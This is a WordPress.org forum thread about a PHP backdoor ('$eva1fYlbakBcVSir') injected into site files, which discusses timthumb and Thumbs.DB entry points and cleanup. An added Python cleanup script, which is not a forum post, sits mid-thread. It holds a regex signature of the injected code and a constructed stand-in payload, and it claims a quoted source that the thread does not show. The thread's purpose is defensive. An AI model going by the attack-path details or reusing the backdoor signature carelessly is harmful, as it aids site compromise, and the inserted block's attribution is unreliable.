WordPress.org


java exploit hack in wp 3.3. beta (29 posts)

  1. 256studio
    Member
    Posted 2 years ago #

    I just got a java exploit error from my anti-virus and I can't log into my admin of my site.
    This is what my virus program called it.
    Exploit:Java/CVE-2010-0840.KM

    http://www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?name=Exploit%3aJava%2fCVE-2010-0840.KM&threatid=2147649278

    The exploit starts at line 127 of the wp-admin/admin-header.php file

    if ( $parent_file == 'options-general.php' )
    	require(ABSPATH . 'wp-admin/options-head.php');
  2. Diegazo
    Member
    Posted 2 years ago #

    I have WordPress 3.2.1 and I had the same problem. You need to delete those lines in all your index.php files (themes, wp-content...) and your blog will work again ;)

  3. mrcupp
    Member
    Posted 2 years ago #

    I've got it on 2 sites; second time in a month since installing/upgrading to 3.2.1

    @diegazo, easy fix yes; total pain when one site has over 500 instances of the exploit ;-)

    I've found it in the following places in my sites:

    * home.php
    * index.php
    * default.php

  4. Diegazo
    Member
    Posted 2 years ago #

    @mrcupp

    Yes, the hack is in all files with that name (or if they have those words in the name). I have WordPress MU and I deleted all files by hand (over 90).

    We discovered the problem. It's about timthumb.php. We were attacked in September, and yesterday. We fixed the problem in September (update timthumb, clean .htaccess), but we didn't clean the themes' cache (Minimal, Coldstone...), and there were two malicious files (php and png). Those files were the last visited before yesterday's attack. The IP was 83.103.119.239. Erase all those files and all will be OK.

  5. mrcupp
    Member
    Posted 2 years ago #

    @diegazo, exactly the same on my primary site (running MU) that got hit in sept as well. totally forgot about the cache in the themes :( 600 files to clean up...wpmu site had about 50 themes on it, and around 25 plugins.

  6. Chip Bennett
    Theme Review Admin
    Posted 2 years ago #

    I don't think this is alpha/beta-testing related.

  7. 256studio
    Member
    Posted 2 years ago #

    I was using the beta version of WP when this happened. But I have another site that got hit at the same time that was using 3.2.1.

  8. Chip Bennett
    Theme Review Admin
    Posted 2 years ago #

    I was using the beta version of WP when this happened.

    Right, but that's just coincidental. You'll get better response by posting in the correct forum, i.e. How-To and Troubleshooting; the people monitoring the Alpha/Beta forum are generally looking for WP 3.3 bugfixes, and would probably be less likely to respond to a general site-hack topic in that forum.

    Fortunately, one of the moderators moved your post for you. :)

  9. thabob
    Member
    Posted 2 years ago #

    Here is what I used to fix it, without restoring backups. Had over 2000 clients' files infected. Use it at your own risk or advise your sysadmin to run it.

    [Code moderated as per the Forum Rules. The maximum number of lines of code that you can post in these forums is ten lines. Please use the pastebin]

  10. 256studio
    Member
    Posted 2 years ago #

    thabob, you need to turn that into a plugin.. that say runs a cron job on a time schedule...

  11. thabob
    Member
    Posted 2 years ago #

    I need to find the source first, I am not even sure it is a WordPress that caused this. I did not find any file named timthumb.php. I also have Joomla, Drupal and wikis installed. Plus it appears my WPs were working fine.

    Making it run as a cron job doesn't solve this problem; it just recovers if your backup procedure is too heavy.

  12. mrcupp
    Member
    Posted 2 years ago #

    the first time the exploit occurred for me was back in sept, and was a hijacked .htaccess file that was including a "Thumbs.DB" file, which was in the root of the wordpress install. It contained the same line of code that is included at the end of all the infected .php files.

    I have a copy of the most recent hack, and can put it up on a hackpad if needed. I however don't have the original Thumbs.DB file since I purged it after the last cleanup.

  13. MickeyRoush
    Member
    Posted 2 years ago #

    the first time the exploit occurred for me was back in sept, and was a hijacked .htaccess file that was including a "Thumbs.DB" file, which was in the root of the wordpress install.

    Thumb.db is a Windows (MS) construct. I notice that some theme/plugin developers leave that and the Mac version (DS_Store) in their directories by accident. Strange that you found one in the root.

    I have a copy of the most recent hack, and can put it up on a hackpad if needed.

    Can you put it up on pastebin (please use pastebin per forum rules) and post the link here? I'd like to examine it.

  14. mrcupp
    Member
    Posted 2 years ago #

    @MickeyRoush, it's a known exploit that has been popping up on a lot of WP based sites (which are probably not up to date on security releases). I don't think it really is WP related though. I've found a few friends who have been affected by this same exploit on servers w/out WP installed. It is more than likely an exploit tied back to phpMyAdmin or a server out-of-date on its security releases. (I know mine is out of date for a few apps).

    the Thumbs.DB exploit was talked about here a few months back actually. here is the link to that forum entry: http://wordpress.org/support/topic/where-to-start-on-this-htaccess-issue

    here is the "official" release about the "Tim Thumb" 0day exploit: http://www.hackersbay.in/2011/08/tim-thumb-wordpress-exploit.html

    here is the link to the pastebin I just made for this as well: http://wordpress.pastebin.ca/2090298

  15. MickeyRoush
    Member
    Posted 2 years ago #

    the Thumbs.DB exploit was talked about here a few months back actually. here is the link to that forum entry: http://wordpress.org/support/topic/where-to-start-on-this-htaccess-issue

    Thanks for the link on that. I wasn't aware of the thumbs.db exploit.

    I am aware of the timthumb exploit. I had to create my own directives to stop the fingerprinting of it.

    Checking out pastebin now... thanks.

  16. ktaylor
    Member
    Posted 2 years ago #

    Hi all,
    We have this issue on our website also. We have gone through deleting the code from the php files, but I have not touched the cache. Can I just delete the cache in the themes folder or do I have to do something else? Is there anything else I need to look for?
    THANKS!! Kaz

  17. alnmco
    Member
    Posted 2 years ago #

    I first got this on Oct 20 though I'm just noticing it today after finding a long suspicious code ...((!isset($eva1fYlbakBcVSir) in my header, footer, and index file. Throughout the week users were reporting that their antivirus blocked my site because of a trojan.

    FYI - I'm completely up to date with wordpress and am using 3.2.1.

    I've deleted all of the malicious code and am in the process of securing things better.

  18. mjjones
    Member
    Posted 2 years ago #

    Found this !isset bit today again even in Twentyten and TwentyEleven themes which I had never used. But my Contact 7 is clean.
    And I got in on 2 sites which didn't have Contact 7.
    And my sites had the latest WP and all plugins updated.
    So there must be various entrances.

  19. ravage
    Member
    Posted 2 years ago #

    I have been fighting this for about a year on installs at work. I traced it back to an occurrence in 2008 on one of the sites. A false user had been injected into the database. But the real source of the constant re-infection seemed to be... "Hello Dolly". Even though the plugin was inactive, once I found the code inside of it and removed it, the attacks stopped (fingers crossed). It has been 2 months since I had to remove the crap from my indexes, headers, and footers, so I hope that was it.
    I did, of course, remove the hidden user, but I did get hit again after that. I had to comb through basically every .php file to find it.
    Of course it's possible that this exploit wears many masks, but if it happens, check your Hello Dolly; since it's in every install, it's a really good target.

  20. 256studio
    Member
    Posted 2 years ago #

    First thing I do is delete the Hello Dolly plugin once I install WP.

  21. Chip Bennett
    Theme Review Admin
    Posted 2 years ago #

    The Hello Dolly Plugin was infected on your install, but it was not the source of the exploit. There's nothing in Hello Dolly even to be exploited, AFAIK. It just hooks some text strings into a hook in the admin header.

  22. tekno23
    Member
    Posted 2 years ago #

    Just FYI, I found a partly-written cleanup Perl substitution, which runs much quicker than the PHP, and is useful for anybody who has shell access to their installation.

    I fixed the quoted strings issues and turned it into a shellscript using a simple 'find' to get the files to clean, which I've put onto pastebin here - http://pastebin.com/8vvWpFR8
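
An added example (mine, not thabob's moderated script nor tekno23's pastebin one-liner) doing the cleanup both posts describe: walk a WordPress tree, strip the injected block the original poster pasted from every .php file while keeping a copy of each infected file, and flag any .htaccess that references Thumbs.DB as mrcupp described. It assumes the injected block sits on one line and ends at the first `?>` after the marker; the payload and the .htaccess line built in demo() are constructed stand-ins, and the thread never says which directive the hijacked .htaccess used.

```python
import os
import re
import shutil
import tempfile

# Opening of the injected block exactly as the original poster showed it; the
# obfuscated payload after it varies, so match lazily up to the closing "?>".
INJECTION_RE = re.compile(
    rb"<\?php @error_reporting\(0\); if \(!isset\(\$eva1fYlbakBcVSir\)\).*?\?>"
)
HTACCESS_RE = re.compile(rb"Thumbs\.DB", re.IGNORECASE)  # earlier wave's dropper

def strip_injection(data):
    """Return (cleaned_bytes, blocks_removed); bytes in, bytes out, so encoding is untouched."""
    out, removed = [], 0
    for line in data.splitlines(keepends=True):
        cleaned, n = INJECTION_RE.subn(b"", line)
        removed += n
        if n and not cleaned.strip():
            continue  # the whole line was the backdoor: drop the line itself
        out.append(cleaned)
    return b"".join(out), removed

def clean_tree(root, dry_run=True):
    """Walk root; return ({php_path: blocks_removed}, [.htaccess paths to review]).
    With dry_run=False each hit is rewritten and the original kept as <name>.infected."""
    cleaned, flagged = {}, []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                data = fh.read()
            if name == ".htaccess" and HTACCESS_RE.search(data):
                flagged.append(path)
            if not name.endswith(".php"):
                continue
            new_data, n = strip_injection(data)
            if n:
                cleaned[path] = n
                if not dry_run:
                    shutil.copy2(path, path + ".infected")  # keep evidence for forensics
                    with open(path, "wb") as fh:
                        fh.write(new_data)
    return cleaned, flagged

def demo():
    """Build a constructed sample tree, clean it for real, and return what happened."""
    root = tempfile.mkdtemp()
    bad = (b"<?php @error_reporting(0); if (!isset($eva1fYlbakBcVSir)) "
           b'{$eva1fYlbakBcVSir = "CONSTRUCTED_PAYLOAD";} ?>')  # stand-in, not the real blob
    with open(os.path.join(root, "index.php"), "wb") as fh:
        fh.write(b"<?php get_header(); ?>\n" + bad + b"\n<?php get_footer(); ?>\n")
    with open(os.path.join(root, ".htaccess"), "wb") as fh:  # constructed; the directive
        fh.write(b"RewriteEngine On\nphp_value auto_prepend_file Thumbs.DB\n")  # is an assumption
    cleaned, flagged = clean_tree(root, dry_run=False)
    with open(os.path.join(root, "index.php"), "rb") as fh:
        index_after = fh.read()
    shutil.rmtree(root)
    return {"cleaned": cleaned, "flagged": flagged, "index_after": index_after}
```

Run clean_tree() with the default dry_run=True first to get the list of hits, then again with dry_run=False once the report looks right.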

  23. audioel
    Member
    Posted 2 years ago #

    Tekno23 - thank you so much for doing that! Worked great, and I had a LOT of sites to run it on.

    Does anyone have any idea how this code is getting injected in?

  24. adpawl
    Member
    Posted 2 years ago #

    @audioel, check this in your server logs

  25. daviddevor
    Member
    Posted 2 years ago #

    @tekno23
    Man, you rock. My work has a VPS with over 50 WordPress installs and most of them were infected; that Perl script saved my life and at least a day's worth of work. AWESOME!

  26. Victoria
    Member
    Posted 2 years ago #

    @tekno23, @audioel, @daviddevor
    Please guide me how to use this 'Bash/Perl fix for "eva1fYlbakBcVSir" WP Backdoor/Malware' code.

    I'm using a VPS as well. Ever since I changed to VPS I've been getting this infection on my sites. I was able to find which files got infected and replaced them with the original files, but they kept coming back with backdoors which I am unable to find.

    Sounds like http://pastebin.com/8vvWpFR8 by tekno23 is the alternative way to prevent the infection. But I have no idea how to use this though... :(

    On my cPanel, I've just created a new key for SSH and made it authorized (SSH/Shell Access). and clicked 'Perl Modules', (page looks like this)....now my head turned to black.... @_@

    I'd be so appreciative if someone can give any tip on how to use this.
    Thanks and best regards.

  27. daviddevor
    Member
    Posted 2 years ago #

    @hyky314

    You need to run this script after you log in with ssh and have the command prompt.

    This will not prevent future attacks, it just helps in removing all segments of the code from your files. Look at the third post from Jan talking about securing your site from future attacks. If your files are already cleared out then you need to take a look at those links and make sure you don't have security issues with your plugins or .htaccess files. Also check your mySQL users and make sure you recognize all of them. This can be another culprit for malware.

    Hope this helps.

  28. taloweb
    Member
    Posted 2 years ago #

    I used a .php file to find infected files and fix it...but I would like to know if the malware entered through a security breach on the server or on WP...

Topic Closed

This topic has been closed to new replies.
